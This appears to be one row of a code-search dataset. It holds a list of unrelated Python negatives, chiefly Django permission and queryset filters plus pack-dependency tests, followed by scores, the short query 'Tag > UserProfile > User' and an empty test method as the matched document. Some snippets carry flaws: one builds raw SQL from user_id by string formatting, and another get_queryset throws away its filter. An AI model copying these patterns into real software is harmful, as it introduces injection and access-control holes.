f\"servicenow/{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}/check\",\n \"AwsAccountId\": awsAccountId,\n \"Types\": [\"Software and Configuration Checks\"],\n \"FirstObservedAt\": iso8601Time,\n \"CreatedAt\": iso8601Time,\n \"UpdatedAt\": iso8601Time,\n \"Severity\": {\"Label\": \"INFORMATIONAL\"},\n \"Confidence\": 99,\n \"Title\": \"[SSPM.Servicenow.AccessControl.16] Instance should enable privacy control over all client-callable script includes accessed by public pages\",\n \"Description\": f\"Servicenow instance {SNOW_INSTANCE_NAME} enables privacy control over all client-callable script includes accessed by public pages.\",\n \"Remediation\": {\n \"Recommendation\": {\n \"Text\": \"For more information refer to the Privacy on client-callable script includes (instance security hardening) section of the Servicenow Product Documentation.\",\n \"Url\": \"https://docs.servicenow.com/bundle/utah-platform-security/page/administer/security/reference/privacy-on-client-callable-script-includes.html\",\n }\n },\n \"ProductFields\": {\n \"ProductName\": \"ElectricEye\",\n \"Provider\": \"ServiceNow\",\n \"ProviderType\": \"SaaS\",\n \"ProviderAccountId\": SNOW_INSTANCE_NAME,\n \"AssetRegion\": SNOW_INSTANCE_REGION,\n \"AssetDetails\": assetB64,\n \"AssetClass\": \"Management & Governance\",\n \"AssetService\": \"System Properties\",\n \"AssetComponent\": \"System Property\"\n },\n \"Resources\": [\n {\n \"Type\": \"ServicenowInstance\",\n \"Id\": f\"{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}\",\n \"Partition\": awsPartition,\n \"Region\": awsRegion,\n \"Details\": {\n \"Other\": {\n \"ServicenowInstance\": SNOW_INSTANCE_NAME,\n \"SysId\": propId,\n \"PropertyName\": evalTarget,\n \"PropertyValue\": propertyValue,\n \"Description\": propDescription,\n \"CreatedBy\": propCreatedBy,\n \"CreatedOn\": propCreatedOn,\n \"UpdatedBy\": propUpdatedBy,\n \"UpdatedOn\": propUpdatedOn,\n \"Scope\": propScope\n }\n }\n }\n ],\n \"Compliance\": {\n \"Status\": \"PASSED\",\n \"RelatedRequirements\": [\n \"NIST CSF V1.1 PR.PT-3\",\n \"NIST SP 800-53 Rev. 4 AC-3\",\n \"NIST SP 800-53 Rev. 4 CM-7\",\n \"AICPA TSC CC6.1\",\n \"ISO 27001:2013 A.6.2.2\", \n \"ISO 27001:2013 A.9.1.2\",\n \"ISO 27001:2013 A.9.4.1\",\n \"ISO 27001:2013 A.9.4.4\",\n \"ISO 27001:2013 A.9.4.5\",\n \"ISO 27001:2013 A.13.1.1\",\n \"ISO 27001:2013 A.14.1.2\",\n \"ISO 27001:2013 A.14.1.3\",\n \"ISO 27001:2013 A.18.1.3\"\n ]\n },\n \"Workflow\": {\"Status\": \"RESOLVED\"},\n \"RecordState\": \"ARCHIVED\"\n }\n yield finding", "def test_collect_playbooks_dependencies_on_indicator_fields(self, module_repo):\n expected_packs = {\n (\"SafeBreach\", True),\n (\"CommonScripts\", True),\n (\"CommonTypes\", True),\n }\n expected_items = {\n (\"playbook\", \"SafeBreach - Compare and Validate Insight Indicators\"): {\n \"SafeBreach\": [(\"integration\", \"SafeBreach\")],\n \"CommonScripts\": [\n (\"script\", \"ChangeContext\"),\n (\"script\", \"Set\"),\n (\"script\", \"SetAndHandleEmpty\"),\n ],\n \"CommonTypes\": [(\"incidentfield\", \"indicator_accounttype\")],\n }\n }\n test_input = [\n {\n \"SafeBreach - Compare and Validate Insight Indicators\": {\n \"name\": \"SafeBreach - Compare and Validate Insight Indicators\",\n \"file_path\": \"Packs/SafeBreach/Playbooks/SafeBreach_Compare_and_Validate_Insight_Indicators.yml\",\n \"fromversion\": \"5.5.0\",\n \"implementing_scripts\": [\n \"ChangeContext\",\n \"Set\",\n \"SetAndHandleEmpty\",\n ],\n \"command_to_integration\": {\"safebreach-get-remediation-data\": \"\"},\n \"tests\": [\"No tests (auto formatted)\"],\n \"pack\": \"SafeBreach\",\n \"indicator_fields\": [\n \"accounttype\",\n ],\n }\n },\n ]\n\n found_packs, found_items = PackDependencies._collect_playbooks_dependencies(\n pack_playbooks=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n get_dependent_items=True,\n )\n\n assert found_packs == expected_packs\n assert found_items == expected_items", "def _check_protects(self, p4user, blobs):\n pc = ProtectsChecker(self.ctx, p4user, self.ctx.authenticated_p4user,\n self.ctx.foruser)\n pc.filter_paths(blobs)\n if pc.has_error():\n raise PreflightException(pc.error_message())", "def _filter_allows(self, ref, filtered_ref):\n for allow in self.allows_:\n if not allow:\n continue\n\n for sub_key, sub_ref in ref.ref_items(allow):\n filtered_ref.setdefault(sub_key).update(sub_ref.config)", "def getInterestedUsers():", "def KLP_Show_Permissions(request, boundary_id, user_id):\n\n userObj = User.objects.get(pk=user_id) # get user object\n boundType_List = Boundary_Type.objects.all() # get all boundary types\n\n # get session value, if session is not set default value is 0\n\n try:\n sessionVal = int(request.session['session_sch_typ'])\n except:\n sessionVal = 0\n redUrl = '/list/%s/user/%s/permissions/' % (boundary_id, user_id)\n\n # get all assigned institutions to the user\n\n assignedInst = Institution.objects.select_related('boundary'\n ).filter(Q(boundary__id=boundary_id)\n | Q(boundary__parent__id=boundary_id)\n | Q(boundary__parent__parent__id=boundary_id),\n active=2).extra(where=['''schools_institution.id in (SELECT \"obj_id\" FROM \"public\".\"object_permissions_institution_perms\" WHERE \"user_id\" = '%s' AND \"Acess\" = '1')'''\n % user_id]).only('id', 'name', 'boundary'\n ).order_by('boundary', 'boundary__parent'\n , 'name')\n\n assignedInstIds = assignedInst.values_list('id', flat=True)\n\n # get unassigned institutions based on assigned institutions\n\n unAssignedInst = Institution.objects.select_related('boundary'\n ).filter(Q(boundary__id=boundary_id)\n | Q(boundary__parent__id=boundary_id)\n | Q(boundary__parent__parent__id=boundary_id),\n active=2).exclude(pk__in=assignedInstIds).only('id'\n , 'name', 'boundary').order_by('boundary',\n 'boundary__parent', 'name')\n\n # get all assigned assessment objects\n\n assignedpermObjects = \\\n UserAssessmentPermissions.objects.select_related('assessment',\n 'instituion'\n ).filter(Q(instituion__boundary__id=boundary_id)\n | Q(instituion__boundary__parent__id=boundary_id)\n | Q(instituion__boundary__parent__parent__id=boundary_id),\n user=userObj, access=True).defer('access'\n ).order_by('instituion__boundary',\n 'instituion__boundary__parent',\n 'instituion__name')\n\n unMapObjs = \\\n Assessment_StudentGroup_Association.objects.select_related('student_group'\n , 'assessment'\n ).filter(Q(student_group__institution__boundary__id=boundary_id)\n | Q(student_group__institution__boundary__parent__id=boundary_id)\n | Q(student_group__institution__boundary__parent__parent__id=boundary_id),\n active=2).defer('active'\n ).order_by('student_group__institution__boundary',\n 'student_group__institution__boundary__parent',\n 'student_group__institution__name')\n for assignedPermObj in assignedpermObjects:\n qsets = Q(assessment=assignedPermObj.assessment) \\\n & Q(student_group__institution=assignedPermObj.instituion)\n unMapObjs = unMapObjs.exclude(qsets)\n unMapList = unMapObjs.values_list('student_group__institution',\n 'assessment').distinct()\n\n # get all unassigned assessment objects\n\n qList = \\\n [Assessment_StudentGroup_Association.objects.select_related('student_group'\n , 'assessment'\n ).filter(student_group__institution__id=unMapVal[0],\n assessment__id=unMapVal[1]).defer('active')[0] for unMapVal in\n unMapList]\n\n return render_to_response('viewtemplates/show_permissions.html', {\n 'assignedInst': assignedInst,\n 'userId': user_id,\n 'userName': userObj.username,\n 'unAssignedInst': unAssignedInst,\n 'assignedpermObjects': assignedpermObjects,\n 'redUrl': redUrl,\n 'qList': qList,\n }, context_instance=RequestContext(request))", "def include_related(request):\n query_param_value = request.GET.get(\"include_related\")\n return query_param_value in [\"true\", \"True\"]", "def _load_filter(self, *args, **kwargs):\n raise NotImplementedError", "def get_is_interested(self, obj):\n # pylint: disable=no-member\n user = self.context['request'].user\n if not user.is_authenticated:\n return None\n profile = UserProfile.objects.get(user=user)\n return profile in obj.interested_users.all()", "def _filter_related_fk(self, rel):\n field = rel.field\n if isinstance(field, models.ForeignKey):\n if self._join_allowed(rel.parent_model, rel.model, field):\n return rel", "def test_collect_incident_field_dependencies(self, module_repo):\n expected_result = {\n # incident types\n # (\"Expanse\", True), (\"IllusiveNetworks\", True),\n # scripts\n (\"Carbon_Black_Enterprise_Response\", True),\n (\"Phishing\", True),\n }\n\n test_input = [\n {\n \"Dummy Incident Field\": {\n \"name\": \"Dummy Incident Field\",\n \"fromversion\": \"5.0.0\",\n \"pack\": \"dummy_pack\",\n \"incident_types\": [\n \"Expanse Appearance\",\n \"Illusive Networks Incident\",\n ],\n \"scripts\": [\"CBLiveFetchFiles\", \"CheckEmailAuthenticity\"],\n }\n }\n ]\n\n found_result = PackDependencies._collect_incidents_fields_dependencies(\n pack_incidents_fields=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n )\n\n assert set(found_result) == set(expected_result)", "def import_various(context):\n # Only run step if a flag file is present\n if context.readDataFile('collective.opensearch-default.txt') is None:\n return\n logger = context.getLogger('collective.opensearch')\n site = context.getSite()\n pass", "def filter_for_user(self, user):\n query = Q(visibility=Document.PUBLIC) | \\\n Q(visibility=Document.PRIVATE, created_by=user) | \\\n Q(visibility=Document.ORG_ONLY,\n organization__memberships__user=user)\n\n if not user.external:\n query = query | Q(visibility=Document.ORG_ONLY_NO_EXTERNAL,\n organization__memberships__user=user)\n\n return super(DocumentManager, self).get_query_set().filter(query) \\\n .distinct()", "def public(self, user=None, project=None):\n queryset = self.filter(\n version__privacy_level=constants.PUBLIC,\n version__project__privacy_level=constants.PUBLIC,\n ).exclude(version__type=EXTERNAL)\n queryset |= self.filter(\n version__type=EXTERNAL,\n project__external_builds_privacy_level=constants.PUBLIC,\n project__privacy_level=constants.PUBLIC,\n )\n if user:\n if user.is_superuser:\n queryset = self.all()\n else:\n queryset = self._add_from_user_projects(\n queryset,\n user,\n admin=True,\n member=True,\n )\n if project:\n queryset = queryset.filter(project=project)\n return queryset.distinct()", "def get_objects(slice, plugin_type, klass, **kwargs):\n try:\n# plugins_modules = settings.PLUGIN_LOADER.plugin_settings.get(plugin_type).get(\"general\").get(\"aggregate_plugins\")[0]\n plugins_modules = PLUGIN_LOADER.plugin_settings.get(plugin_type).get(\"general\").get(\"aggregate_plugins\")[0]\n p_agg = plugins_modules.split('.')[-1]\n p_models_path = '.'.join(plugins_modules.split('.')[:-1])\n try:\n model = getattr(__import__(p_models_path,fromlist=[klass]), klass)\n except: \n try: \n model = getattr(__import__(p_models_path+'.'+klass,fromlist=[klass]), klass)\n except:\n pass \n # Filters resources by slice (will not return any aggregate's resource from another slice)\n objects = model.objects.filter(**kwargs)\n #print \"objects: %s\" % str(objects)\n for obj in objects:\n if not (obj != None and obj.aggregate in slice._get_aggregates()):\n raise Exception\n return objects\n except Exception,e:\n print \"[ERROR] PluginCommunicator could not obtain object. Details: %s \" % str(e)\n return None", "def test_collect_incident_field_dependencies_with_items(self, module_repo):\n expected_result = (\n {(\"Phishing\", True), (\"Carbon_Black_Enterprise_Response\", True)},\n {\n (\"incident_field\", \"Dummy Incident Field\"): {\n \"Carbon_Black_Enterprise_Response\": [\n (\"script\", \"CBLiveFetchFiles\")\n ],\n \"Phishing\": [(\"script\", \"CheckEmailAuthenticity\")],\n }\n },\n )\n\n test_input = [\n {\n \"Dummy Incident Field\": {\n \"name\": \"Dummy Incident Field\",\n \"fromversion\": \"5.0.0\",\n \"pack\": \"dummy_pack\",\n \"incident_types\": [\n \"Expanse Appearance\",\n \"Illusive Networks Incident\",\n ],\n \"scripts\": [\"CBLiveFetchFiles\", \"CheckEmailAuthenticity\"],\n }\n }\n ]\n\n found_result = PackDependencies._collect_incidents_fields_dependencies(\n pack_incidents_fields=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n get_dependent_items=True,\n )\n\n assert found_result == expected_result", "def dependency_filter(dependencies,start=0,end=-1,filter_val=None,filter_vals=[],field=None,filter_range='dependent'):\n return [getattr(i, field) if field else i for i in dependencies if \n (start == 0 or getattr(i, filter_range).idx >= start) and \n (end == -1 or getattr(i, filter_range).idx < end) and \n ((filter_val == None and not filter_vals) or i.type in filter_vals + [filter_val] or (filter_val[-1]=='*' and i.type.startswith(filter_val[0:-1])))\n ]", "def allow_relation(self, obj1, obj2, **hints):\n\n result = (obj1._meta.model_name in DefaultRouting.defaultModels and \n obj2._meta.model_name in DefaultRouting.defaultModels)\n return result", "def test_get_risk_profile_all_using_get(self):\n pass", "def generate_exclusions(proteins):\n pass", "def _check_ws_objects(self, source_objects):\n\n if source_objects:\n objects = [{\"ref\": ref} for ref in source_objects]\n info = self.get_workspace().get_object_info3(\n {\"objects\": objects, \"ignoreErrors\": 1}\n )\n paths = info.get(\"paths\")\n\n if None in paths:\n raise ValueError(\"Some workspace object is inaccessible\")", "def get_queryset(self, request):\n qs = super().get_queryset(request)\n if request.user.is_superuser:\n return qs\n\n return qs.filter(bank=request.user.profile.bank)", "def get_queryset(self, request):\n qs = super().get_queryset(request)\n if request.user.is_superuser:\n return qs\n\n return qs.filter(bank=request.user.profile.bank)", "def test_collect_playbooks_dependencies_on_filter(self, module_repo):\n expected_result = {(\"CommonScripts\", True)}\n\n test_input = [\n {\n \"Dummy Playbook\": {\n \"name\": \"Dummy Playbook\",\n \"file_path\": \"dummy_path\",\n \"fromversion\": \"dummy_version\",\n \"filters\": [\"IsInCidrRanges\"],\n }\n },\n ]\n\n found_result = PackDependencies._collect_playbooks_dependencies(\n pack_playbooks=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n )\n\n assert set(found_result) == set(expected_result)", "def test_collect_playbooks_dependencies_on_incident_fields(self, module_repo):\n expected_result = {(\"DigitalGuardian\", False), (\"EmployeeOffboarding\", False)}\n test_input = [\n {\n \"Dummy Playbook\": {\n \"name\": \"Dummy Playbook\",\n \"file_path\": \"dummy_path\",\n \"fromversion\": \"dummy_version\",\n \"implementing_scripts\": [],\n \"implementing_playbooks\": [],\n \"command_to_integration\": {},\n \"tests\": [\"dummy_playbook\"],\n \"pack\": \"dummy_pack\",\n \"incident_fields\": [\n \"digitalguardianusername\",\n \"Google Display Name\",\n ],\n }\n }\n ]\n\n found_result = PackDependencies._collect_playbooks_dependencies(\n pack_playbooks=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n )\n\n assert set(found_result) == set(expected_result)", "def test_whitelist(self):\n p = self.load_policy({\n 'name': 'test-key-vault',\n 'resource': 'azure.keyvault',\n 'filters': [\n {'type': 'value',\n 'key': 'name',\n 'op': 'glob',\n 'value_type': 'normalize',\n 'value': 'cckeyvault1*'},\n {'not': [\n {'type': 'whitelist',\n 'key': 'principalName',\n 'users': ['[email protected]']}\n ]}\n ]\n })\n resources = p.run()\n self.assertEqual(len(resources), 1)", "def _filter_in_request(self):\n pass", "def get_queryset(self):\n qs = super().get_queryset()\n qs.filter(company=self.request.user.company)\n return qs", "def test_profile_filtering(instr_task_workbench, instr_view):\n add_profile(instr_task_workbench, 'fp5', 'Dummy.dumb.002')\n p = instr_task_workbench.get_plugin('ecpy.instruments')\n filtered = instr_view.filter_profiles(p._profiles)\n assert 'fp5' not in filtered\n\n add_profile(instr_task_workbench, 'fp6', 'Dummy.dumb.003')\n p = instr_task_workbench.get_plugin('ecpy.instruments')\n filtered = instr_view.filter_profiles(p._profiles)\n assert 'fp6' in filtered", "def test_filter_by_atribute(admin_client, public_resource_with_metadata, private_resource_with_metadata):\n query_filter = {\"availability\": [\"public\"]}\n djangoresponse = admin_client.get('/discoverapi/?filter={}'.format(json.dumps(query_filter)), follow=True)\n response = json.loads(djangoresponse.content.decode(\"utf-8\"))\n short_ids = [x['short_id'] for x in json.loads(response['resources'])]\n assert djangoresponse.status_code == 200\n assert public_resource_with_metadata.short_id in short_ids\n assert private_resource_with_metadata.short_id not in short_ids", "def isAuthorized(user, ress_name, action_name):\r\n #Import model that support PGSQL schema if difined\r\n if hasattr(settings, 'ACL_UTILS'):\r\n try:\r\n utils = __import__(settings.ACL_UTILS, fromlist=['*'])\r\n return utils.isAuthorized(user, ress_name, action_name)\r\n except ImportError:\r\n raise Exception(\"ACL UTILS import Error\")\r\n else:\r\n utils = __import__(\"geoprisma.acl.utils\", fromlist=['*'])\r\n return utils.isAuthorized(user, ress_name, action_name)", "def _get_includes(self):\n models = []\n op, targets = self.get_data()\n if op == self.OPERATOR.NOT:\n return models\n\n for t in targets:\n if isinstance(t, ObjectModel):\n models += [t]\n elif isinstance(t, TargetingCriterion):\n if op != self.OPERATOR.NOT:\n models += t._get_includes()\n\n return models", "def check_faceted_search_users(integrated_ff):\n key, ff_env = integrated_ff['ff_key'], integrated_ff['ff_env']\n all_facets = ff_utils.get_item_facets('user', key=key, ff_env=ff_env)\n any_affiliation = {'item_type': 'user',\n 'key': key,\n 'ff_env': ff_env,\n 'item_facets': all_facets}\n resp = ff_utils.faceted_search(**any_affiliation)\n total = len(resp)\n print(\"total=\", total) # Probably a number somewhere near 30\n assert 10 < total < 50\n affiliation = {'item_type': 'user',\n 'Affiliation': '4DN Testing Lab',\n 'key': key,\n 'ff_env': ff_env,\n 'item_facets': all_facets}\n resp = ff_utils.faceted_search(**affiliation)\n affiliated = len(resp)\n print(\"affiliated=\", affiliated) # Probably a number near 5\n assert affiliated < 10\n neg_affiliation = {'item_type': 'user',\n 'Affiliation': '-4DN Testing Lab',\n 'key': key,\n 'ff_env': ff_env,\n 'item_facets': all_facets}\n resp = ff_utils.faceted_search(**neg_affiliation)\n unaffiliated = len(resp) # Probably a number near 25, but in any case the length of the complement set\n assert unaffiliated == total - affiliated\n neg_affiliation = {'item_type': 'user',\n 'Affiliation': '-4DN Testing Lab',\n 'key': key,\n 'ff_env': ff_env,\n 'item_facets': all_facets,\n 'Limit': '10'} # test limit\n resp = ff_utils.faceted_search(**neg_affiliation)\n assert len(resp) == 10", "def test_user_get_objects_any_perms_related(self):\n group0 = self.test_save('TestGroup0', user0)\n \n object2 = TestModel.objects.create(name='test2')\n object2.save()\n \n child0 = TestModelChild.objects.create(parent=object0)\n child1 = TestModelChild.objects.create(parent=object1)\n child2 = TestModelChild.objects.create(parent=object2)\n child3 = TestModelChild.objects.create(parent=object2)\n child0.save()\n child1.save()\n child2.save()\n \n childchild = TestModelChildChild.objects.create(parent=child0)\n childchild.save()\n \n group0.grant('Perm1', object0) # perms on both\n group0.grant('Perm2', child0) # perms on both\n group0.grant('Perm3', object1) # perm on parent only (child 1)\n group0.grant('Perm4', child2) # perm on child only\n group0.grant('Perm1', childchild)\n \n user0.grant('Perm1', object0) # perms on both\n user0.grant('Perm2', child0) # perms on both\n \n # related field with implicit perms\n query = user0.get_objects_any_perms(TestModelChild, parent=None)\n self.assert_(child0 in query, 'user should have perms on parent and directly')\n self.assert_(child1 in query, 'user should have perms on parent')\n self.assert_(child2 in query, 'user should have perms on parent, and directly')\n self.assertFalse(child3 in query, 'user should have no perms on this object or its parent')\n self.assertEqual(3, len(query))\n \n # related field with single perms\n query = user0.get_objects_any_perms(TestModelChild, parent=['Perm3'])\n \n self.assert_(child0 in query, 'user should have perms on parent and directly')\n self.assert_(child1 in query, 'user should have perms on parent')\n self.assert_(child2 in query, 'user should have perms on parent')\n self.assertFalse(child3 in query, 'user should have no perms on this object or its parent')\n self.assertEqual(3, len(query), query.values('id'))\n \n # related field with multiple perms\n query = user0.get_objects_any_perms(TestModelChild, parent=['Perm1','Perm3'])\n self.assert_(child0 in query, 'user should have perms on parent and directly')\n self.assert_(child1 in query, 'user should have perms on parent')\n self.assert_(child2 in query, 'user should have perms on parent')\n self.assertFalse(child3 in query, 'user should have no perms on this object or its parent')\n self.assertEqual(3, len(query))\n \n # mix of direct and related perms\n query = user0.get_objects_any_perms(TestModelChild, perms=['Perm4'], parent=['Perm1'])\n self.assertEqual(2, len(query))\n self.assert_(child0 in query, 'user should have perms on parent and directly')\n self.assertFalse(child1 in query, 'user should not have perms on parent')\n self.assert_(child2 in query, 'user should have perms directly')\n self.assertFalse(child3 in query, 'user should have no perms on this object or its parent')\n \n # multiple relations\n query = user0.get_objects_any_perms(TestModelChildChild, parent=['Perm2'], parent__parent=['Perm1'])\n self.assert_(childchild in query)\n self.assertEqual(1, len(query))\n \n # exclude groups\n query = user0.get_objects_any_perms(TestModelChild, groups=False, parent=['Perm1'])\n self.assert_(child0 in query)\n self.assertEqual(1, len(query))", "def __conclusion(self, *args, **kwargs):\n pass", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def checkMetamodelLevel(cls):\n for mmd in cls.metamodelDependencies():\n mmd.check()", "def get_model_queryset(self, request):\n if request.user.is_superuser:\n result = Field.objects.all()\n elif hasattr(request.user, 'farmuser'):\n result = Field.objects.filter(farm_user=request.user.farmuser)\n elif hasattr(request.user, 'farmchilduser'):\n result = Field.objects.filter(farm_user=request.user.farmchilduser.master)\n else:\n return None\n return filter_by_date_updated(request=request, queryset=result)", "def on_includes(self, includes):\n pass", "def checkImport(self):\r\n for imp in self.cap_file.Import.packages:\r\n if a2s(imp.aid) not in export_refs:\r\n return False\r\n return True", "def autofixDependencies(self, global_ctx):\n pass", "def _referencedChecker(self, entity, params):\n\n if 'ref_logic' not in params:\n return False\n\n logic = self.helper.getLogicForItem(params, 'ref_logic')\n filter = {\n params['ref_field']: entity.key()\n }\n ref_entity = logic.getForFields(filter=filter, unique=True)\n\n result = ref_entity is not None\n\n no_ref = params.get('no_ref')\n if no_ref:\n result = not result\n\n return result", "def __has_no_dependents (self, obj, constraints):\n failed = False\n while constraints and not failed:\n c = constraints [0]\n\n if c [1] == obj:\n failed = True\n\n constraints = constraints [1:]\n\n return not failed", "def testPrefetchProvenance(self):\n try:\n provU = ProvenanceProvider(self.__cfgOb, self.__cachePath)\n pD = provU.fetch()\n logger.debug(\"pD keys %r\", list(pD.keys()))\n self.assertGreaterEqual(len(pD.keys()), 1)\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def allow_relation(self, obj1, obj2, **hints):\n\t\tif obj1._meta.app_label == 'product' or \\\n\t\t obj2._meta.app_label == 'product':\n\t\t return True\n\t\treturn None", "def _constraints_external(self):\n pass", "def checkRequiredDependencies(self):\n \n # skip dependency check for downloading only\n if( self.downloadOnly ):\n return\n\n # hard dependencies\n for req in self.reqmodules:\n if( self.parent.module(req) == None ):\n # check if there is an auto detected module\n if( self.parent.module(req, True) == None ):\n self.abort( self.name + \" requires \" + req \\\n + \" and it wasn't found in your config file!!\" )\n else:\n # use auto detected module\n self.parent.use( self.parent.module(req, True) )\n self.parent.module( req ).init()\n\n print self.name + \": auto-detected \" + req + \" version \" + self.parent.module( req ).version\n \n # build only dependencies\n if( self.mode == \"install\" ):\n mods = self.reqmodules_buildonly + self.reqmodules_external\n for req in mods:\n if( self.parent.module(req) == None ):\n # check if there is an auto detected module\n if( self.parent.module(req, True) == None ):\n self.abort( req + \" not found in your config file!! \" + self.name \\\n + \" cannot be built without \" + req )\n else:\n # use auto detected module\n self.parent.use( self.parent.module(req, True) )\n self.parent.module( req ).init()\n\n print \" - \" + self.name + \": auto-detected \" + req + \" version \" + self.parent.module( req ).version", "def check_requirements(self):\n # first, separate plugins based on those with and without dependeices.\n remaining = set()\n loaded = set()\n\n for k, v in self.modules.items():\n if v.requirements:\n remaining.add(v)\n else:\n loaded.add(k)\n self.module_call_order.append(v)\n\n for r in remaining:\n # first we check to make sure that all dependencies are satisfied.\n if not self.dependencies_satisfied(r):\n raise Exception(f\"Oops! Module {r} is not satisfied! It desires: {r.requirements}\")\n\n # now confident that all versions check out, arrange the plugins into a suitable load order.\n # no reason to do anything fancy without requirements though.\n if not remaining:\n return\n\n while True:\n new_remaining = remaining.copy()\n for m in remaining:\n if loaded.issuperset({r for r in m.requirements.keys()}):\n new_remaining.remove(m)\n loaded.add(m.name)\n self.module_call_order.append(m)\n if len(new_remaining) < len(remaining):\n # this is good.. we made progress!\n remaining = new_remaining\n if not remaining:\n # hooray! No more plugins to process\n break\n else:\n # this is bad. we are not making progress.\n raise Exception(\"dependency load order is not progressing!\")", "def _relation_check(self):\n seen = set()\n for entity in self.get_entities():\n for field in entity.fields.itervalues():\n if field.is_relation():\n seen.add(field.remote_name)\n missing = seen - set(self.entities.keys())\n if missing:\n raise exceptions.SchemaError(\n 'undefined entities referenced in relations: %s' % (\n ', '.join(missing)))", "def test_content_categories(app_audited, redisdb_targeting, redisdb_profiles):\n content_categories = ContentCategory.objects.all()\n\n for strategy in Strategy.objects.all():\n strategy.content_category_values = content_categories\n trigger_cache_mappings()\n\n check_target_values(redisdb_targeting, content_categories)\n\n for strategy in Strategy.objects.all():\n strategy.content_category_values.clear()\n strategy.content_category_values_exclude = content_categories\n trigger_cache_mappings()\n\n check_target_values(redisdb_targeting, content_categories, include=False)", "def test_get_virtual_account_beneficiaries(self):\n pass", "def get_is_por_holder(self, obj):\n user = self.context['request'].user\n if not user.is_authenticated:\n return False\n # pylint: disable=no-member\n profile = UserProfile.objects.get(user=user)\n\n if profile == obj.club.secy:\n return True\n\n if profile in obj.club.joint_secy.all():\n return True\n\n if profile == obj.club.council.gensec:\n return True\n\n if profile in obj.club.council.joint_gensec.all():\n return True\n\n return False", "def setup_eager_loading(queryset):\n queryset = queryset.select_related('user')\n return queryset", "def do_get_invites_controlled_by_user(user_profile: UserProfile) -> List[Dict[str, Any]]:\n if user_profile.is_realm_admin:\n prereg_users = filter_to_valid_prereg_users(\n PreregistrationUser.objects.filter(referred_by__realm=user_profile.realm)\n )\n else:\n prereg_users = filter_to_valid_prereg_users(\n PreregistrationUser.objects.filter(referred_by=user_profile)\n )\n\n invites = []\n\n for invitee in prereg_users:\n assert invitee.referred_by is not None\n invites.append(\n dict(\n email=invitee.email,\n invited_by_user_id=invitee.referred_by.id,\n invited=datetime_to_timestamp(invitee.invited_at),\n expiry_date=get_invitation_expiry_date(invitee.confirmation.get()),\n id=invitee.id,\n invited_as=invitee.invited_as,\n is_multiuse=False,\n )\n )\n\n if not user_profile.is_realm_admin:\n # We do not return multiuse invites to non-admin users.\n return invites\n\n multiuse_confirmation_objs = Confirmation.objects.filter(\n realm=user_profile.realm, type=Confirmation.MULTIUSE_INVITE\n ).filter(Q(expiry_date__gte=timezone_now()) | Q(expiry_date=None))\n for confirmation_obj in multiuse_confirmation_objs:\n invite = confirmation_obj.content_object\n assert invite is not None\n\n # This should be impossible, because revoking a multiuse invite\n # deletes the Confirmation object, so it couldn't have been fetched above.\n assert invite.status != confirmation_settings.STATUS_REVOKED\n invites.append(\n dict(\n invited_by_user_id=invite.referred_by.id,\n invited=datetime_to_timestamp(confirmation_obj.date_sent),\n expiry_date=get_invitation_expiry_date(confirmation_obj),\n id=invite.id,\n link_url=confirmation_url(\n confirmation_obj.confirmation_key,\n user_profile.realm,\n Confirmation.MULTIUSE_INVITE,\n ),\n invited_as=invite.invited_as,\n is_multiuse=True,\n )\n )\n return invites", "def filter_queryset(self, request, queryset, view):\n user = request.user\n project_id = view.kwargs.get(view.lookup_field)\n\n if user.is_anonymous:\n return queryset.filter(Q(shared=True))\n\n if project_id:\n int_or_parse_error(\n project_id,\n \"Invalid value for project_id. It must be a positive integer.\",\n )\n\n # check if project is public and return it\n try:\n project = queryset.get(id=project_id)\n except ObjectDoesNotExist as non_existent_object:\n raise Http404 from non_existent_object\n\n if project.shared:\n return queryset.filter(Q(id=project_id))\n\n return super().filter_queryset(request, queryset, view)", "def test_itar_restrict_asset(self):\n pass", "def pkg_ifcs_requires(me, pkg, ifcs):\n un = set()\n for i in ifcs:\n if (pkg,i) in me._pkg_ifc_reqs:\n un.update(me._pkg_ifc_reqs[pkg,i])\n return un", "def all_versions_where(self, pred):\n for v in self.versions:\n if pred(v['id'], v['name']):\n yield self.get_version(v['id'])", "def _target_filter(self, obj):\r\n return type(obj).__name__ in ['Cube'] and not obj.is_grasped # List because may be extended to other objects.\r" ]
[ "0.55593485", "0.5515848", "0.548871", "0.53242356", "0.5323796", "0.5270651", "0.52381533", "0.5179091", "0.51565045", "0.5153947", "0.50942135", "0.50636023", "0.4970877", "0.4866266", "0.48630893", "0.48102677", "0.47713712", "0.47691986", "0.47338426", "0.4730474", "0.4702195", "0.47008726", "0.46833804", "0.46815392", "0.4666007", "0.46590638", "0.4625202", "0.46190557", "0.46127832", "0.46127832", "0.4609541", "0.46059498", "0.45987454", "0.45979112", "0.45924667", "0.45912224", "0.4582612", "0.45657712", "0.45610318", "0.45581374", "0.4553742", "0.45527327", "0.45492738", "0.4542811", "0.45366198", "0.45280686", "0.45186174", "0.45136544", "0.45094258", "0.45083708", "0.4496403", "0.4493632", "0.44905284", "0.44901785", "0.44868082", "0.44840652", "0.44813874", "0.44783768", "0.44776374", "0.4467233", "0.44669032", "0.44599292", "0.44579914", "0.44579914", "0.44554007", "0.44545078", "0.44534048", "0.44521546", "0.4443146", "0.4442461", "0.443463", "0.4427735", "0.44235682", "0.44215435", "0.44191915", "0.4416336", "0.4414955", "0.44137552", "0.44065812", "0.4406019", "0.44059226", "0.44050792", "0.44048208", "0.43981335", "0.43876404", "0.43873605", "0.43872887", "0.43865997", "0.43846062", "0.43844426", "0.43842387", "0.43798855", "0.43784904", "0.43769467", "0.43740857", "0.43727347", "0.43726397", "0.43674228", "0.4359809", "0.435853" ]
0.6230097
0
Tag > UserProfile > User
def test_twice_dependent_object_import(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
